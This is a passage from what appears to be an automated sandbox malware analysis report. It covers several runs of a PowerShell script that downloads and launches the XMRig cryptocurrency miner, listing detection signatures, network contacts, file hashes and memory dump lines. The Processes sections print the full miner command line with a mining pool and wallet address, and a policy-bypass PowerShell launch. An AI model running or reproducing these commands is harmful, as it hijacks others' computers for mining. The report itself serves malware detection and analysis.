memory/3508-145-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-146-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-147-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-148-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-149-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-150-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-151-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-152-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-153-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-154-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-155-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-156-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-157-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:27
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4776 wrote to memory of 1528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4776 wrote to memory of 1528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4776-2-0x00007FFBD5FE3000-0x00007FFBD5FE4000-memory.dmp
memory/4776-5-0x000001866BA80000-0x000001866BAA2000-memory.dmp
memory/4776-6-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/4776-9-0x000001866BBB0000-0x000001866BC26000-memory.dmp
memory/4776-18-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdiwrfl2.kr4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4776-25-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/4776-48-0x000001866B990000-0x000001866B9A2000-memory.dmp
memory/4776-61-0x000001866B980000-0x000001866B98A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1528-90-0x000001D0E8EC0000-0x000001D0E8EE0000-memory.dmp
memory/1528-91-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-92-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/4776-93-0x00007FFBD5FE3000-0x00007FFBD5FE4000-memory.dmp
memory/4776-94-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/4776-95-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp
memory/1528-96-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-97-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-98-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-99-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-100-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-101-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-102-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-103-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-104-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-105-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-106-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-107-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-108-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-109-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-110-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-111-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-112-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-113-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-114-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-115-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-116-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-117-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-118-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-119-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-120-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-121-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-122-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-123-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-124-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-125-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-126-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-127-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-128-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-129-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-130-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-131-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-132-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-133-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-134-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-135-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-136-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-137-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-138-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-139-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-140-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-141-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-142-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-143-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-144-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-145-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-146-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-147-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-148-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-149-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-150-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-151-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-152-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-153-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-154-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-155-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
memory/1528-156-0x00007FF6362C0000-0x00007FF636EF3000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:30
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1758s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4788 wrote to memory of 3000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4788 wrote to memory of 3000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
memory/4788-0-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5r2fz2l.xkh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4788-10-0x0000022DBB1B0000-0x0000022DBB1D2000-memory.dmp
memory/4788-11-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4788-12-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4788-14-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4788-15-0x0000022DBB420000-0x0000022DBB432000-memory.dmp
memory/4788-16-0x0000022DB8FA0000-0x0000022DB8FAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3000-47-0x00000185B96A0000-0x00000185B96C0000-memory.dmp
memory/3000-48-0x00000185B96F0000-0x00000185B9710000-memory.dmp
memory/3000-49-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-50-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-51-0x00000185B9710000-0x00000185B9730000-memory.dmp
memory/4788-52-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
memory/4788-53-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/3000-54-0x00000185BAFF0000-0x00000185BB010000-memory.dmp
memory/4788-55-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/3000-56-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-58-0x00000185B9710000-0x00000185B9730000-memory.dmp
memory/3000-57-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-59-0x00000185BAFF0000-0x00000185BB010000-memory.dmp
memory/3000-60-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-61-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-62-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-63-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-64-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-65-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-66-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-67-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-68-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-69-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-70-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-71-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-72-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-73-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-74-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-75-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-76-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-77-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-78-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-79-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-80-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-81-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-82-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-83-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-84-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-85-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-86-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-87-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-88-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-89-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-90-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-91-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-92-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-93-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-94-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-95-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-96-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-97-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-98-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-99-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-100-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-101-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-102-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-103-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-104-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-105-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-106-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-107-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-108-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-109-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-110-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-111-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-112-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-113-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-114-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-115-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-116-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-117-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-118-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:18
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1765s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
